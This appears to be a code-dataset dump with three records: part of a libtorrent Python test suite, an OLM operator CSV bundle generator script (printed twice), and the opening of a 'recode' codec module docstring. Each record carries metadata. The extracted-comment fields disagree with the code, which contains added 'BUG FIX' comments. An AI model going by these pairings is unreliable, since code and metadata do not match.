        self.h = self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd()})

    def test_torrent_handle(self):
        self.setup()
        self.assertEqual(self.h.file_priorities(), [4, 4])
        self.assertEqual(self.h.piece_priorities(), [4])

        self.h.prioritize_files([0, 1])
        self.assertEqual(self.h.file_priorities(), [0, 1])

        self.h.prioritize_pieces([0])
        self.assertEqual(self.h.piece_priorities(), [0])

        # also test the overload that takes a list of piece->priority mappings
        self.h.prioritize_pieces([(0, 1)])
        self.assertEqual(self.h.piece_priorities(), [1])

    def test_torrent_handle_in_set(self):
        self.setup()
        torrents = set()
        torrents.add(self.h)

        # get another instance of a torrent_handle that represents the same
        # torrent. Make sure that when we add it to a set, it just replaces the
        # existing object
        t = self.ses.get_torrents()
        self.assertEqual(len(t), 1)
        for h in t:
            torrents.add(h)
        self.assertEqual(len(torrents), 1)

    def test_torrent_handle_in_dict(self):
        self.setup()
        torrents = {}
        torrents[self.h] = 'foo'

        # get another instance of a torrent_handle that represents the same
        # torrent. Make sure that when we add it to a dict, it just replaces the
        # existing object
        t = self.ses.get_torrents()
        self.assertEqual(len(t), 1)
        for h in t:
            torrents[h] = 'bar'
        self.assertEqual(len(torrents), 1)
        self.assertEqual(torrents[self.h], 'bar')

    def test_replace_trackers(self):
        self.setup()
        trackers = []
        for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
            tracker = lt.announce_entry(tracker_url)
            tracker.tier = idx
            tracker.fail_limit = 2
            trackers.append(tracker)
        self.h.replace_trackers(trackers)
        new_trackers = self.h.trackers()
        self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
        self.assertEqual(new_trackers[1]['tier'], 1)
        self.assertEqual(new_trackers[1]['fail_limit'], 2)

    def test_pickle_trackers(self):
        """Test lt objects convertors are working and trackers can be pickled"""
        self.setup()
        tracker = lt.announce_entry('udp://tracker1.com')
        tracker.tier = 0
        tracker.fail_limit = 1
        trackers = [tracker]
        self.h.replace_trackers(trackers)
        tracker_list = [tracker for tracker in self.h.trackers()]
        pickled_trackers = pickle.dumps(tracker_list)
        unpickled_trackers = pickle.loads(pickled_trackers)
        self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
        self.assertEqual(unpickled_trackers[0]['last_error']['value'], 0)

    def test_file_status(self):
        self.setup()
        status_list = self.h.file_status()
        print(status_list)

    def test_piece_deadlines(self):
        self.setup()
        self.h.clear_piece_deadlines()

    def test_torrent_status(self):
        self.setup()
        st = self.h.status()
        ti = st.handle
        self.assertEqual(ti.info_hash(), self.ti.info_hash())
        # make sure we can compare torrent_status objects
        st2 = self.h.status()
        self.assertEqual(st2, st)

    def test_serialize_trackers(self):
        """Test to ensure the dict contains only python built-in types"""
        self.setup()
        self.h.add_tracker({'url': 'udp://tracker1.com'})
        tr = self.h.trackers()[0]
        # wait a bit until a valid timestamp appears
        # (fixed: compare against None with `is`, not `==` — PEP 8)
        while tr['next_announce'] is None:
            time.sleep(0.1)
            tr = self.h.trackers()[0]
        import json
        print(json.dumps(self.h.trackers()[0]))

    def test_scrape(self):
        self.setup()
        # this is just to make sure this function can be called like this
        # from python
        self.h.scrape_tracker()

    def test_cache_info(self):
        self.setup()
        cs = self.ses.get_cache_info(self.h)
        self.assertEqual(cs.pieces, [])
class test_torrent_info(unittest.TestCase):
    """Construction and inspection of torrent_info objects."""

    def test_bencoded_constructor(self):
        info = lt.torrent_info({'info': {'name': 'test_torrent', 'length': 1234,
                                         'piece length': 16 * 1024,
                                         'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
        self.assertEqual(info.num_files(), 1)

        f = info.files()
        self.assertEqual(f.file_path(0), 'test_torrent')
        self.assertEqual(f.file_size(0), 1234)
        self.assertEqual(info.total_size(), 1234)

    def test_metadata(self):
        ti = lt.torrent_info('base.torrent')
        self.assertTrue(len(ti.metadata()) != 0)
        self.assertTrue(len(ti.hash_for_piece(0)) != 0)

    def test_web_seeds(self):
        ti = lt.torrent_info('base.torrent')
        ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
              {'url': 'http://bar/test', 'auth': '', 'type': 1}]
        ti.set_web_seeds(ws)
        web_seeds = ti.web_seeds()
        self.assertEqual(len(ws), len(web_seeds))
        for i in range(len(web_seeds)):
            self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
            self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
            self.assertEqual(web_seeds[i]["type"], ws[i]["type"])

    def test_iterable_files(self):
        # this detects whether libtorrent was built with deprecated APIs
        # the file_storage object is only iterable for backwards compatibility
        if not hasattr(lt, 'version'):
            return
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ti = lt.torrent_info('url_seed_multi.torrent')
        files = ti.files()

        idx = 0
        expected = ['bar.txt', 'var.txt']
        for f in files:
            print(f.path)
            self.assertEqual(os.path.split(f.path)[1], expected[idx])
            self.assertEqual(os.path.split(os.path.split(f.path)[0]), ('temp', 'foo'))
            idx += 1

    def test_announce_entry(self):
        ae = lt.announce_entry('test')
        # assertEqual: assertEquals is a deprecated alias, removed in Python 3.12
        self.assertEqual(ae.can_announce(False), True)
        self.assertEqual(ae.scrape_incomplete, -1)
        self.assertEqual(ae.next_announce, None)
        self.assertEqual(ae.last_error.value(), 0)
class test_alerts(unittest.TestCase):
    """Alert delivery and torrent_status field access."""

    def test_alert(self):
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ti = lt.torrent_info('base.torrent')
        h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
        st = h.status()
        time.sleep(1)
        ses.remove_torrent(h)
        ses.wait_for_alert(1000)  # milliseconds
        alerts = ses.pop_alerts()
        for a in alerts:
            if a.what() == 'add_torrent_alert':
                # assertEqual: assertEquals is deprecated (removed in 3.12)
                self.assertEqual(a.torrent_name, 'temp')
            print(a.message())
            for field_name in dir(a):
                if field_name.startswith('__'):
                    continue
                field = getattr(a, field_name)
                if callable(field):
                    print('   ', field_name, ' = ', field())
                else:
                    print('   ', field_name, ' = ', field)
        print(st.next_announce)
        self.assertEqual(st.name, 'temp')
        print(st.errc.message())
        print(st.pieces)
        print(st.last_seen_complete)
        print(st.completed_time)
        print(st.progress)
        print(st.num_pieces)
        print(st.distributed_copies)
        print(st.paused)
        print(st.info_hash)
        self.assertEqual(st.save_path, os.getcwd())

    def test_pop_alerts(self):
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
        # this will cause an error (because of duplicate torrents) and the
        # torrent_info object created here will be deleted once the alert goes out
        # of scope. When that happens, it will decrement the python object, to allow
        # it to release the object.
        # we're trying to catch the error described in this post, with regards to
        # torrent_info.
        # https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
        ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
        time.sleep(1)

        for i in range(0, 10):
            alerts = ses.pop_alerts()
            for a in alerts:
                print(a.message())
            time.sleep(0.1)
class test_bencoder(unittest.TestCase):
    def test_bencode(self):
        """Encoding a plain dict yields canonical bencoded bytes."""
        payload = {'a': 1, 'b': [1, 2, 3], 'c': 'foo'}
        self.assertEqual(lt.bencode(payload), b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')

    def test_bdecode(self):
        """Decoding returns byte-keyed/byte-valued primitives."""
        raw = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
        self.assertEqual(lt.bdecode(raw), {b'a': 1, b'b': [1, 2, 3], b'c': b'foo'})
class test_sha1hash(unittest.TestCase):
    def test_sha1hash(self):
        """A sha1_hash built from raw digest bytes stringifies back to hex."""
        hex_digest = 'a0' * 20
        digest = lt.sha1_hash(binascii.unhexlify(hex_digest))
        self.assertEqual(hex_digest, str(digest))
class test_magnet_link(unittest.TestCase):
    def test_parse_magnet_uri(self):
        """Adding a parsed magnet URI yields the expected info-hash."""
        session = lt.session({})
        params = lt.parse_magnet_uri('magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI')
        params['save_path'] = '.'
        handle = session.add_torrent(params)
        self.assertEqual(str(handle.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
    """Peer-class creation, configuration and filtering."""

    def test_peer_class_ids(self):
        s = lt.session({'enable_dht': False})

        print('global_peer_class_id:', lt.session.global_peer_class_id)
        print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
        print('local_peer_class_id:', lt.session.local_peer_class_id)

        print('global: ', s.get_peer_class(s.global_peer_class_id))
        # fixed copy-paste bug: the 'tcp' line previously queried
        # local_peer_class_id, so the tcp class was never exercised
        print('tcp: ', s.get_peer_class(s.tcp_peer_class_id))
        print('local: ', s.get_peer_class(s.local_peer_class_id))

    def test_peer_class(self):
        s = lt.session({'enable_dht': False})
        c = s.create_peer_class('test class')
        print('new class: ', s.get_peer_class(c))
        nfo = s.get_peer_class(c)
        self.assertEqual(nfo['download_limit'], 0)
        self.assertEqual(nfo['upload_limit'], 0)
        self.assertEqual(nfo['ignore_unchoke_slots'], False)
        self.assertEqual(nfo['connection_limit_factor'], 100)
        self.assertEqual(nfo['download_priority'], 1)
        self.assertEqual(nfo['upload_priority'], 1)
        self.assertEqual(nfo['label'], 'test class')

        nfo['download_limit'] = 1337
        nfo['upload_limit'] = 1338
        nfo['ignore_unchoke_slots'] = True
        nfo['connection_limit_factor'] = 42
        nfo['download_priority'] = 2
        nfo['upload_priority'] = 3

        s.set_peer_class(c, nfo)

        nfo2 = s.get_peer_class(c)
        self.assertEqual(nfo, nfo2)

    def test_peer_class_filter(self):
        filt = lt.peer_class_type_filter()
        filt.add(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id)
        filt.remove(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id)
        filt.disallow(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id)
        filt.allow(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id)

    def test_peer_class_ip_filter(self):
        s = lt.session({'enable_dht': False})
        s.set_peer_class_type_filter(lt.peer_class_type_filter())
        s.set_peer_class_filter(lt.ip_filter())
class test_session(unittest.TestCase):
    """Session construction, settings application and settings presets."""

    def test_post_session_stats(self):
        s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
        s.post_session_stats()
        alerts = []
        # first the stats headers log line. but not if logging is disabled
        if 'log_alert' in [i[0] for i in inspect.getmembers(lt)]:
            s.wait_for_alert(1000)
            alerts = s.pop_alerts()
            a = alerts.pop(0)
            self.assertTrue(isinstance(a, lt.log_alert))
        # then the actual stats values
        if len(alerts) == 0:
            s.wait_for_alert(1000)
            alerts = s.pop_alerts()
        a = alerts.pop(0)
        self.assertTrue(isinstance(a, lt.session_stats_alert))
        self.assertTrue(isinstance(a.values, dict))
        self.assertTrue(len(a.values) > 0)

    def test_unknown_settings(self):
        try:
            s = lt.session({'unexpected-key-name': 42})
            # self.fail() is the idiomatic "no exception was raised" marker
            # (replaces assertFalse on a truthy string, same AssertionError)
            self.fail('should have thrown an exception')
        except KeyError as e:
            print(e)

    def test_fingerprint(self):
        self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
        self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')

    def test_deprecated_settings(self):
        # this detects whether libtorrent was built with deprecated APIs
        if hasattr(lt, 'version'):
            s = lt.session({'enable_dht': False})
            sett = lt.session_settings()
            sett.num_want = 10
            s.set_settings(sett)
            s.set_settings({'num_want': 33})
            self.assertEqual(s.get_settings()['num_want'], 33)

    def test_apply_settings(self):
        s = lt.session({'enable_dht': False})
        s.apply_settings({'num_want': 66, 'user_agent': '<PASSWORD>'})
        self.assertEqual(s.get_settings()['num_want'], 66)
        self.assertEqual(s.get_settings()['user_agent'], '<PASSWORD>')

    def test_min_memory_preset(self):
        min_mem = lt.min_memory_usage()
        print(min_mem)
        self.assertTrue('connection_speed' in min_mem)
        self.assertTrue('file_pool_size' in min_mem)

    def test_seed_mode_preset(self):
        seed_mode = lt.high_performance_seed()
        print(seed_mode)
        self.assertTrue('alert_queue_size' in seed_mode)
        self.assertTrue('connection_speed' in seed_mode)
        self.assertTrue('file_pool_size' in seed_mode)

    def test_default_settings(self):
        default = lt.default_settings()
        print(default)
if __name__ == '__main__':
    # Print the bindings version, stage the fixture .torrent files next to
    # this script (the tests open them by bare filename), then run the suite.
    print(lt.__version__)
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'url_seed_multi.torrent'), '.')
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'base.torrent'), '.')
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'unordered.torrent'), '.')
    unittest.main()
|
en
| 0.860912
|
#!/usr/bin/env python # also test the overload that takes a list of piece->priority mappings # get another instance of a torrent_handle that represents the same # torrent. Make sure that when we add it to a set, it just replaces the # existing object # get another instance of a torrent_handle that represents the same # torrent. Make sure that when we add it to a dict, it just replaces the # existing object Test lt objects convertors are working and trackers can be pickled # make sure we can compare torrent_status objects Test to ensure the dict contains only python built-in types # wait a bit until a valid timestamp appears # this is just to make sure this function can be called like this # from python # this detects whether libtorrent was built with deprecated APIs # the file_strage object is only iterable for backwards compatibility # milliseconds # this will cause an error (because of duplicate torrents) and the # torrent_info object created here will be deleted once the alert goes out # of scope. When that happens, it will decrement the python object, to allow # it to release the object. # we're trying to catch the error described in this post, with regards to # torrent_info. # https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html # first the stats headers log line. but not if logging is disabled # then the actual stats values # this detects whether libtorrent was built with deprecated APIs
| 2.364894
| 2
|
scripts/gen_operator_csv.py
|
staebler/osd-operators-registry
| 4
|
6627621
|
<filename>scripts/gen_operator_csv.py
#!/usr/bin/env python
#
# Generate an operator bundle for publishing to OLM. Copies appropriate files
# into a directory, and composes the ClusterServiceVersion which needs bits and
# pieces of our rbac and deployment files.
#
import datetime
import os
import sys
import yaml
import shutil
import subprocess
if __name__ == '__main__':
    if len(sys.argv) != 8:
        print("USAGE: %s OPERATOR_DIR OPERATOR_NAME OPERATOR_NAMESPACE OPERATOR_VERSION OPERATOR_IMAGE CHANNEL_NAME MULTI_NAMESPACE" % sys.argv[0])
        sys.exit(1)
    operator_dir = sys.argv[1]
    operator_name = sys.argv[2]
    operator_namespace = sys.argv[3]
    operator_version = sys.argv[4]
    operator_image = sys.argv[5]
    channel_name = sys.argv[6]
    # Coerce to a boolean. BUG FIX: the original compared sys.argv[7] against
    # "true".lower() (a no-op on the literal), so "True"/"TRUE" were silently
    # treated as false. Lowercase the *argument* instead.
    multi_namespace = sys.argv[7].lower() == "true"

    catalog_dir = os.path.join("catalog-manifests", operator_name)
    operator_assets_dir = os.path.join(operator_dir, "manifests")

    # Check to see if the manifests directory exists before going on.
    if not os.path.exists(operator_assets_dir):
        # BUG FIX: 'print >> sys.stderr, ...' is Python 2 syntax; under
        # Python 3 it raises a TypeError at runtime. Use file= instead
        # (same fix applied to every stderr print below).
        print("ERROR Operator asset directory {} does not exist. Giving up.".format(operator_assets_dir), file=sys.stderr)
        sys.exit(1)
    if not os.path.exists(catalog_dir):
        os.mkdir(catalog_dir)

    # Bail out (successfully) if a bundle for the target version already exists.
    version_dir = os.path.join(catalog_dir, operator_version)
    if os.path.exists(version_dir):
        print("INFO version already exists, skipping: {}".format(version_dir), file=sys.stderr)
        sys.exit(0)
    # Doesn't exist; create the target version directory.
    os.mkdir(version_dir)

    # Read the currently published CSV name (if any) so the new CSV can
    # declare that it 'replaces' it.
    package_filename = operator_name + ".package.yaml"
    package_file = os.path.join(catalog_dir, package_filename)
    prev_csv = None
    if os.path.isfile(package_file):
        with open(package_file) as stream:
            for obj in yaml.safe_load_all(stream):
                prev_csv = obj['channels'][0]['currentCSV']

    # Create the (single-channel) package content pointing at the new CSV.
    package = {
        'packageName': operator_name,
        'channels': [
            {'currentCSV': "%s.v%s" % (operator_name, operator_version), 'name': channel_name},
        ],
    }
    with open(package_file, 'w') as outfile:
        yaml.dump(package, outfile, default_flow_style=False)
    print("Wrote Package: %s" % package_file)

    print("Generating CSV for version: %s" % operator_version)
    with open('scripts/templates/csv.yaml', 'r') as stream:
        csv = yaml.safe_load(stream)

    # Fill in the templated values.
    csv['metadata']['name'] = operator_name
    csv['metadata']['namespace'] = operator_namespace
    csv['metadata']['containerImage'] = operator_image
    csv['spec']['displayName'] = operator_name
    csv['spec']['description'] = "SRE operator - " + operator_name
    csv['spec']['version'] = operator_version
    csv['spec']['install']['spec']['clusterPermissions'] = []

    SA_NAME = operator_name

    # First pass over the manifests: collect the names of all ClusterRoles
    # bound to the operator's ServiceAccount via a ClusterRoleBinding.
    clusterrole_names_csv = []
    for subdir, dirs, files in os.walk(operator_assets_dir):
        for file in files:
            file_path = os.path.join(subdir, file)
            with open(file_path) as stream:
                for obj in yaml.safe_load_all(stream):
                    if not obj:
                        # Skip empty YAML documents (e.g. a trailing '---').
                        continue
                    if obj['kind'] == 'ClusterRoleBinding':
                        for subject in obj['subjects']:
                            if subject['kind'] == 'ServiceAccount' and subject['name'] == SA_NAME:
                                clusterrole_names_csv.append(obj['roleRef']['name'])

    # Placeholder entry; its 'spec' is populated when the Deployment is found.
    csv['spec']['install']['spec']['deployments'] = [{'spec': {}}]

    # Second pass: populate clusterPermissions and the deployment in the CSV,
    # and copy RBAC manifests into the bundle directory.
    for subdir, dirs, files in os.walk(operator_assets_dir):
        for file in files:
            file_path = os.path.join(subdir, file)
            with open(file_path) as stream:
                for obj in yaml.safe_load_all(stream):
                    if not obj:
                        continue
                    # BUG FIX: the original used a substring test
                    # (any(name in cr for cr in ...)), which could also match
                    # unrelated roles whose name merely *contains* this one.
                    # Use exact membership instead.
                    if obj['kind'] == 'ClusterRole' and obj['metadata']['name'] in clusterrole_names_csv:
                        print('Adding ClusterRole to CSV: {}'.format(file_path))
                        csv['spec']['install']['spec']['clusterPermissions'].append(
                            {
                                'rules': obj['rules'],
                                'serviceAccountName': SA_NAME,
                            })
                    if obj['kind'] == 'Deployment' and obj['metadata']['name'] == operator_name:
                        print('Adding Deployment to CSV: {}'.format(file_path))
                        csv['spec']['install']['spec']['deployments'][0]['spec'] = obj['spec']
                        csv['spec']['install']['spec']['deployments'][0]['name'] = operator_name
                    if obj['kind'] in ('ClusterRole', 'Role', 'RoleBinding', 'ClusterRoleBinding'):
                        if obj['kind'] in ('RoleBinding', 'ClusterRoleBinding'):
                            # Require a well-formed roleRef: OLM doesn't check
                            # this until deployment, when the InstallPlan fails.
                            # (Replaces the original try/print/except-KeyError
                            # probe, which also leaked a debug print.)
                            if 'kind' not in obj.get('roleRef', {}):
                                print("ERROR {} '{}' is missing .roleRef.kind in file {}".format(obj['kind'], obj['metadata']['name'], file_path), file=sys.stderr)
                                sys.exit(1)
                        print('Adding {} to Catalog: {}'.format(obj['kind'], file_path))
                        if 'namespace' in obj['metadata']:
                            bundle_filename = "10-{}.{}.{}.yaml".format(obj['metadata']['namespace'], obj['metadata']['name'], obj['kind']).lower()
                        else:
                            bundle_filename = "00-{}.{}.yaml".format(obj['metadata']['name'], obj['kind']).lower()
                        shutil.copyfile(file_path, os.path.join(version_dir, bundle_filename))

    # BUG FIX: the original tested len(deployments) == 0, which could never be
    # true because a placeholder entry is always appended above. Verify the
    # placeholder's spec was actually populated instead.
    if not csv['spec']['install']['spec']['deployments'][0]['spec']:
        print("ERROR Did not find any Deployments in {}. There is nothing to deploy, so giving up.".format(operator_assets_dir), file=sys.stderr)
        sys.exit(1)

    # Update the deployment to use the defined image.
    csv['spec']['install']['spec']['deployments'][0]['spec']['template']['spec']['containers'][0]['image'] = operator_image

    # Version the CSV name and record which CSV it replaces (if any).
    csv['metadata']['name'] = "%s.v%s" % (operator_name, operator_version)
    csv['spec']['version'] = operator_version
    if prev_csv is not None:
        csv['spec']['replaces'] = prev_csv

    # Adjust the MultiNamespace install mode, if present.
    for idx, mode in enumerate(csv['spec']['installModes']):
        if mode['type'] == "MultiNamespace":
            csv['spec']['installModes'][idx]['supported'] = multi_namespace
            break

    # Set the CSV createdAt annotation. BUG FIX: the original stamped *local*
    # time with a 'Z' (UTC) suffix; use actual UTC so the timestamp is honest.
    now = datetime.datetime.utcnow()
    csv['metadata']['annotations']['createdAt'] = now.strftime("%Y-%m-%dT%H:%M:%SZ")

    # Write the CSV to disk.
    csv_filename = "20-%s.v%s.clusterserviceversion.yaml" % (operator_name, operator_version)
    csv_file = os.path.join(version_dir, csv_filename)
    with open(csv_file, 'w') as outfile:
        yaml.dump(csv, outfile, default_flow_style=False)
    print("Wrote ClusterServiceVersion: %s" % csv_file)
|
<filename>scripts/gen_operator_csv.py
#!/usr/bin/env python
#
# Generate an operator bundle for publishing to OLM. Copies appropriate files
# into a directory, and composes the ClusterServiceVersion which needs bits and
# pieces of our rbac and deployment files.
#
import datetime
import os
import sys
import yaml
import shutil
import subprocess
if __name__ == '__main__':
    if len(sys.argv) != 8:
        print("USAGE: %s OPERATOR_DIR OPERATOR_NAME OPERATOR_NAMESPACE OPERATOR_VERSION OPERATOR_IMAGE CHANNEL_NAME MULTI_NAMESPACE" % sys.argv[0])
        sys.exit(1)
    operator_dir = sys.argv[1]
    operator_name = sys.argv[2]
    operator_namespace = sys.argv[3]
    operator_version = sys.argv[4]
    operator_image = sys.argv[5]
    channel_name = sys.argv[6]
    # Coerce to a boolean. BUG FIX: the original compared sys.argv[7] against
    # "true".lower() (a no-op on the literal), so "True"/"TRUE" were silently
    # treated as false. Lowercase the *argument* instead.
    multi_namespace = sys.argv[7].lower() == "true"

    catalog_dir = os.path.join("catalog-manifests", operator_name)
    operator_assets_dir = os.path.join(operator_dir, "manifests")

    # Check to see if the manifests directory exists before going on.
    if not os.path.exists(operator_assets_dir):
        # BUG FIX: 'print >> sys.stderr, ...' is Python 2 syntax; under
        # Python 3 it raises a TypeError at runtime. Use file= instead
        # (same fix applied to every stderr print below).
        print("ERROR Operator asset directory {} does not exist. Giving up.".format(operator_assets_dir), file=sys.stderr)
        sys.exit(1)
    if not os.path.exists(catalog_dir):
        os.mkdir(catalog_dir)

    # Bail out (successfully) if a bundle for the target version already exists.
    version_dir = os.path.join(catalog_dir, operator_version)
    if os.path.exists(version_dir):
        print("INFO version already exists, skipping: {}".format(version_dir), file=sys.stderr)
        sys.exit(0)
    # Doesn't exist; create the target version directory.
    os.mkdir(version_dir)

    # Read the currently published CSV name (if any) so the new CSV can
    # declare that it 'replaces' it.
    package_filename = operator_name + ".package.yaml"
    package_file = os.path.join(catalog_dir, package_filename)
    prev_csv = None
    if os.path.isfile(package_file):
        with open(package_file) as stream:
            for obj in yaml.safe_load_all(stream):
                prev_csv = obj['channels'][0]['currentCSV']

    # Create the (single-channel) package content pointing at the new CSV.
    package = {
        'packageName': operator_name,
        'channels': [
            {'currentCSV': "%s.v%s" % (operator_name, operator_version), 'name': channel_name},
        ],
    }
    with open(package_file, 'w') as outfile:
        yaml.dump(package, outfile, default_flow_style=False)
    print("Wrote Package: %s" % package_file)

    print("Generating CSV for version: %s" % operator_version)
    with open('scripts/templates/csv.yaml', 'r') as stream:
        csv = yaml.safe_load(stream)

    # Fill in the templated values.
    csv['metadata']['name'] = operator_name
    csv['metadata']['namespace'] = operator_namespace
    csv['metadata']['containerImage'] = operator_image
    csv['spec']['displayName'] = operator_name
    csv['spec']['description'] = "SRE operator - " + operator_name
    csv['spec']['version'] = operator_version
    csv['spec']['install']['spec']['clusterPermissions'] = []

    SA_NAME = operator_name

    # First pass over the manifests: collect the names of all ClusterRoles
    # bound to the operator's ServiceAccount via a ClusterRoleBinding.
    clusterrole_names_csv = []
    for subdir, dirs, files in os.walk(operator_assets_dir):
        for file in files:
            file_path = os.path.join(subdir, file)
            with open(file_path) as stream:
                for obj in yaml.safe_load_all(stream):
                    if not obj:
                        # Skip empty YAML documents (e.g. a trailing '---').
                        continue
                    if obj['kind'] == 'ClusterRoleBinding':
                        for subject in obj['subjects']:
                            if subject['kind'] == 'ServiceAccount' and subject['name'] == SA_NAME:
                                clusterrole_names_csv.append(obj['roleRef']['name'])

    # Placeholder entry; its 'spec' is populated when the Deployment is found.
    csv['spec']['install']['spec']['deployments'] = [{'spec': {}}]

    # Second pass: populate clusterPermissions and the deployment in the CSV,
    # and copy RBAC manifests into the bundle directory.
    for subdir, dirs, files in os.walk(operator_assets_dir):
        for file in files:
            file_path = os.path.join(subdir, file)
            with open(file_path) as stream:
                for obj in yaml.safe_load_all(stream):
                    if not obj:
                        continue
                    # BUG FIX: the original used a substring test
                    # (any(name in cr for cr in ...)), which could also match
                    # unrelated roles whose name merely *contains* this one.
                    # Use exact membership instead.
                    if obj['kind'] == 'ClusterRole' and obj['metadata']['name'] in clusterrole_names_csv:
                        print('Adding ClusterRole to CSV: {}'.format(file_path))
                        csv['spec']['install']['spec']['clusterPermissions'].append(
                            {
                                'rules': obj['rules'],
                                'serviceAccountName': SA_NAME,
                            })
                    if obj['kind'] == 'Deployment' and obj['metadata']['name'] == operator_name:
                        print('Adding Deployment to CSV: {}'.format(file_path))
                        csv['spec']['install']['spec']['deployments'][0]['spec'] = obj['spec']
                        csv['spec']['install']['spec']['deployments'][0]['name'] = operator_name
                    if obj['kind'] in ('ClusterRole', 'Role', 'RoleBinding', 'ClusterRoleBinding'):
                        if obj['kind'] in ('RoleBinding', 'ClusterRoleBinding'):
                            # Require a well-formed roleRef: OLM doesn't check
                            # this until deployment, when the InstallPlan fails.
                            # (Replaces the original try/print/except-KeyError
                            # probe, which also leaked a debug print.)
                            if 'kind' not in obj.get('roleRef', {}):
                                print("ERROR {} '{}' is missing .roleRef.kind in file {}".format(obj['kind'], obj['metadata']['name'], file_path), file=sys.stderr)
                                sys.exit(1)
                        print('Adding {} to Catalog: {}'.format(obj['kind'], file_path))
                        if 'namespace' in obj['metadata']:
                            bundle_filename = "10-{}.{}.{}.yaml".format(obj['metadata']['namespace'], obj['metadata']['name'], obj['kind']).lower()
                        else:
                            bundle_filename = "00-{}.{}.yaml".format(obj['metadata']['name'], obj['kind']).lower()
                        shutil.copyfile(file_path, os.path.join(version_dir, bundle_filename))

    # BUG FIX: the original tested len(deployments) == 0, which could never be
    # true because a placeholder entry is always appended above. Verify the
    # placeholder's spec was actually populated instead.
    if not csv['spec']['install']['spec']['deployments'][0]['spec']:
        print("ERROR Did not find any Deployments in {}. There is nothing to deploy, so giving up.".format(operator_assets_dir), file=sys.stderr)
        sys.exit(1)

    # Update the deployment to use the defined image.
    csv['spec']['install']['spec']['deployments'][0]['spec']['template']['spec']['containers'][0]['image'] = operator_image

    # Version the CSV name and record which CSV it replaces (if any).
    csv['metadata']['name'] = "%s.v%s" % (operator_name, operator_version)
    csv['spec']['version'] = operator_version
    if prev_csv is not None:
        csv['spec']['replaces'] = prev_csv

    # Adjust the MultiNamespace install mode, if present.
    for idx, mode in enumerate(csv['spec']['installModes']):
        if mode['type'] == "MultiNamespace":
            csv['spec']['installModes'][idx]['supported'] = multi_namespace
            break

    # Set the CSV createdAt annotation. BUG FIX: the original stamped *local*
    # time with a 'Z' (UTC) suffix; use actual UTC so the timestamp is honest.
    now = datetime.datetime.utcnow()
    csv['metadata']['annotations']['createdAt'] = now.strftime("%Y-%m-%dT%H:%M:%SZ")

    # Write the CSV to disk.
    csv_filename = "20-%s.v%s.clusterserviceversion.yaml" % (operator_name, operator_version)
    csv_file = os.path.join(version_dir, csv_filename)
    with open(csv_file, 'w') as outfile:
        yaml.dump(csv, outfile, default_flow_style=False)
    print("Wrote ClusterServiceVersion: %s" % csv_file)
|
en
| 0.831335
|
#!/usr/bin/env python # # Generate an operator bundle for publishing to OLM. Copies appropriate files # into a directory, and composes the ClusterServiceVersion which needs bits and # pieces of our rbac and deployment files. # # Coerce to a boolean # Check to see if the manifests directory exists before going on. # fail if there is a bundle for the target version already # doesn't exist, create the target version # update operator package # create package content # set templated values # Parse each file and look for ClusterRoleBindings to the SA # Parse files to manage clusterPermissions and deployments in csv # require a well formed roleRef, olm doesn't check this until deployed and InstallPlan fails # Update the deployment to use the defined image: # Update the versions to include git hash: # adjust the install mode for multiple namespaces, if we need to # Set the CSV createdAt annotation: # Write the CSV to disk:
| 2.201246
| 2
|
recode/__init__.py
|
otosense/recode
| 0
|
6627622
|
r"""
Make codecs for fixed size structured chunks serialization and deserialization of
sequences, tabular data, and time-series.
The easiest and biggest bang for your buck is ``mk_codec``
>>> from recode import mk_codec
>>> encoder, decoder = mk_codec()
``encoder`` will encode a list (or any iterable) of numbers into bytes
>>> b = encoder([0, -3, 3.14])
>>> b
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xc0\x1f\x85\xebQ\xb8\x1e\t@'
``decoder`` will decode those bytes to get you back your numbers
>>> decoder(b)
[0.0, -3.0, 3.14]
There's only really one argument you need to know about in ``mk_codec``.
The first argument, called `chk_format`, which is a string of characters from
the "Format" column of
https://docs.python.org/3/library/struct.html#format-characters
The length of the string specifies the number of "channels",
and each individual character of the string specifies the kind of encoding you should
apply to each "channel" (hold your horses, we'll explain).
The one we've just been through is in fact
>>> encoder, decoder = mk_codec('d')
That is, it will expect that your data is a list of numbers, and they'll be encoded
with the 'd' format character, that is 8-bytes doubles.
That default is good because it gives you a lot of room, but if you knew that you
would only be dealing with 2-byte integers (as in most WAV audio waveforms),
you would have chosen `h`:
>>> encoder, decoder = mk_codec('h')
What about those channels?
Well, sometimes you need to encode/decode multi-channel streams, such as:
>>> multi_channel_stream = [[3, -1], [4, -1], [5, -9]]
Say, for example, if you were dealing with stereo waveform
